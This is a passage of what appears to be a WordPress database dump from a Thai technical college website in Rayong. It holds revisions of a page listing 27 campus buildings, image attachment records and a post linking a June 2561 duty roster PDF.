อาคารไฟฟ้ากำลัง</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">19. อาคารช่างยนต์</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">20. อาคารช่างกลโรงงาน</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">22. อาคาร 4 ชั้น (อบจ)</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">23. อาคารโรงยาง</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">24. อาคารเทคนิคพื้นฐาน</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">25. อาคารตึกส้ม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">26. อาคารการโรงแรม</span></strong></h2>\r\n<h2><strong><span style=\"color: #3366ff;\">27. อาคารธนาคาร</span></strong></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%ad%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88', '', '', '2018-10-02 12:55:43', '2018-10-02 05:55:43', '', 0, 'http://www.technicrayong.ac.th/?page_id=2809', 0, 'page', '', 0),
(2811, 3, '2018-05-30 13:40:27', '2018-05-30 06:40:27', '<img class=\"aligncenter wp-image-2810 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-13-38-37.jpg\" alt=\"\" width=\"836\" height=\"506\" />', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 13:40:27', '2018-05-30 06:40:27', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2813, 3, '2018-05-30 14:09:40', '2018-05-30 07:09:40', '', '5-2-2561 11-03-33', '', 'inherit', 'closed', 'closed', '', '5-2-2561-11-03-33', '', '', '2018-05-30 14:09:40', '2018-05-30 07:09:40', '', 2809, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/5-2-2561-11-03-33.jpg', 0, 'attachment', 'image/jpeg', 0),
(2814, 3, '2018-05-30 14:10:11', '2018-05-30 07:10:11', '', '15345314', '', 'inherit', 'closed', 'closed', '', '15345314', '', '', '2018-05-30 14:10:11', '2018-05-30 07:10:11', '', 2809, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/15345314.jpg', 0, 'attachment', 'image/jpeg', 0),
(2815, 3, '2018-05-30 14:12:13', '2018-05-30 07:12:13', '', '30-5-2561 14-14-12', '', 'inherit', 'closed', 'closed', '', '30-5-2561-14-14-12', '', '', '2018-05-30 14:12:13', '2018-05-30 07:12:13', '', 2809, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(2816, 3, '2018-05-30 14:17:49', '2018-05-30 07:17:49', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-2813\" src=\"/wp-content/uploads/2018/05/5-2-2561-11-03-33-300x201.jpg\" alt=\"\" width=\"400\" height=\"267\" /> <img class=\"alignleft wp-image-2814\" src=\"/wp-content/uploads/2018/05/15345314-300x200.jpg\" alt=\"\" width=\"400\" height=\"267\" />', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:17:49', '2018-05-30 07:17:49', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2817, 3, '2018-05-30 14:19:50', '2018-05-30 07:19:50', '', '30-5-2561 14-21-41', '', 'inherit', 'closed', 'closed', '', '30-5-2561-14-21-41', '', '', '2018-05-30 14:19:50', '2018-05-30 07:19:50', '', 2809, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg', 0, 'attachment', 'image/jpeg', 0),
(2818, 3, '2018-05-30 14:20:33', '2018-05-30 07:20:33', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-2813\" src=\"/wp-content/uploads/2018/05/5-2-2561-11-03-33-300x201.jpg\" alt=\"\" width=\"400\" height=\"267\" /><img class=\"alignleft wp-image-2814\" src=\"/wp-content/uploads/2018/05/15345314-300x200.jpg\" alt=\"\" width=\"400\" height=\"267\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:20:33', '2018-05-30 07:20:33', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2821, 3, '2018-05-30 14:26:12', '2018-05-30 07:26:12', '', '30-5-2561 14-28-08', '', 'inherit', 'closed', 'closed', '', '30-5-2561-14-28-08', '', '', '2018-05-30 14:26:12', '2018-05-30 07:26:12', '', 2809, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg', 0, 'attachment', 'image/jpeg', 0),
(2822, 3, '2018-05-30 14:26:31', '2018-05-30 07:26:31', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:26:31', '2018-05-30 07:26:31', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2824, 3, '2018-05-30 14:49:15', '2018-05-30 07:49:15', '', '42566265256526', '', 'inherit', 'closed', 'closed', '', '42566265256526', '', '', '2018-05-30 14:49:15', '2018-05-30 07:49:15', '', 2809, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/42566265256526.jpg', 0, 'attachment', 'image/jpeg', 0),
(2825, 3, '2018-05-30 14:50:20', '2018-05-30 07:50:20', '', '30-5-2561 14-52-27', '', 'inherit', 'closed', 'closed', '', '30-5-2561-14-52-27', '', '', '2018-05-30 14:50:20', '2018-05-30 07:50:20', '', 2809, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/30-5-2561-14-52-27.jpg', 0, 'attachment', 'image/jpeg', 0),
(2826, 3, '2018-05-30 14:52:05', '2018-05-30 07:52:05', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-2825 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-52-27.jpg\" alt=\"\" width=\"229\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:52:05', '2018-05-30 07:52:05', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2827, 3, '2018-05-30 14:52:45', '2018-05-30 07:52:45', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"wp-image-2825 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-52-27.jpg\" alt=\"\" width=\"229\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:52:45', '2018-05-30 07:52:45', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2828, 3, '2018-05-30 14:56:29', '2018-05-30 07:56:29', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n<h3><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h3>\r\n<h3><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h3>\r\n<h3><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h3>\r\n<h3><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h3>\r\n<h3><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h3>\r\n<h3><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h3>\r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:56:29', '2018-05-30 07:56:29', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2829, 3, '2018-05-30 14:57:33', '2018-05-30 07:57:33', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:57:33', '2018-05-30 07:57:33', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2830, 3, '2018-05-30 14:58:22', '2018-05-30 07:58:22', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n<h2></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:58:22', '2018-05-30 07:58:22', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2831, 3, '2018-05-30 14:59:30', '2018-05-30 07:59:30', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n<h2></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n<h2><span style=\"color: #800000;\">8. อาคารปิโตรเคมี</span></h2>\r\n<h2><span style=\"color: #800000;\">9. อาคารโรงอาหาร</span></h2>\r\n<h2><span style=\"color: #800000;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></h2>\r\n \r\n\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:59:30', '2018-05-30 07:59:30', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2832, 3, '2018-05-30 14:59:50', '2018-05-30 07:59:50', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n<h2><span style=\"color: #800000;\">8. อาคารปิโตรเคมี</span></h2>\r\n<h2><span style=\"color: #800000;\">9. อาคารโรงอาหาร</span></h2>\r\n<h2><span style=\"color: #800000;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></h2>\r\n \r\n\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 14:59:50', '2018-05-30 07:59:50', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2833, 3, '2018-05-30 15:01:19', '2018-05-30 08:01:19', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n<h2><span style=\"color: #ffffff;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n<h2><span style=\"color: #800000;\">8. อาคารปิโตรเคมี</span></h2>\r\n<h2><span style=\"color: #800000;\">9. อาคารโรงอาหาร</span></h2>\r\n<h2><span style=\"color: #800000;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></h2>\r\n \r\n\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 15:01:19', '2018-05-30 08:01:19', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2834, 3, '2018-05-30 15:16:09', '2018-05-30 08:16:09', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2></h2>\r\n<h2><span style=\"color: #ffffff;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n<h2><span style=\"color: #800000;\">8. อาคารปิโตรเคมี</span></h2>\r\n<h2><span style=\"color: #800000;\">9. อาคารโรงอาหาร</span></h2>\r\n<h2><span style=\"color: #800000;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></h2>\r\n<h2><span style=\"color: #800000;\">11. อาคารช่างก่อสร้าง</span></h2>\r\n<h2><span style=\"color: #800000;\">12. อาคารตึกอำนวยการ</span></h2>\r\n<h2><span style=\"color: #800000;\">13. อาคาร AUA</span></h2>\r\n<h2><span style=\"color: #800000;\">14. อาคารพัสดุ</span></h2>\r\n<h2><span style=\"color: #800000;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">16. อาคารเรียนสามัญ</span></h2>\r\n<h2><span style=\"color: #800000;\">17. อาคารไฟฟ้ากำลัง</span></h2>\r\n<h2><span style=\"color: #800000;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">19. อาคารช่างยนต์</span></h2>\r\n<h2><span style=\"color: #800000;\">20. อาคารช่างกลโรงงาน</span></h2>\r\n<h2><span style=\"color: #800000;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></h2>\r\n<h2><span style=\"color: #800000;\">22. อาคาร 4 ชั้น (อบจ)</span></h2>\r\n<h2><span style=\"color: #800000;\">23. อาคารโรงยาง</span></h2>\r\n<h2><span style=\"color: #800000;\">24. อาคารเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">25. อาคารตึกส้ม</span></h2>\r\n<h2><span style=\"color: #800000;\">26. อาคารการโรงแรม</span></h2>\r\n<h2><span style=\"color: #800000;\">27. อาคารธนาคาร</span></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-05-30 15:16:09', '2018-05-30 08:16:09', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2835, 3, '2018-05-31 11:30:02', '2018-05-31 04:30:02', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%A1%E0%B8%B4%E0%B8%96%E0%B8%B8%E0%B8%99%E0%B8%B2%E0%B8%A2%E0%B8%99-2561-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนมิถุนายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%a1%e0%b8%b4%e0%b8%96%e0%b8%b8%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%99-2561', '', '', '2018-05-31 11:30:02', '2018-05-31 04:30:02', '', 0, 'http://www.technicrayong.ac.th/?p=2835', 406, 'post', '', 0),
(2837, 3, '2018-05-31 11:29:30', '2018-05-31 04:29:30', '', 'ตารางเวร เดือนมิถุนายน 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%a1%e0%b8%b4%e0%b8%96%e0%b8%b8%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-2', '', '', '2018-05-31 11:29:30', '2018-05-31 04:29:30', '', 2835, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ตารางเวร-เดือนมิถุนายน-2561-1.pdf', 0, 'attachment', 'application/pdf', 0),
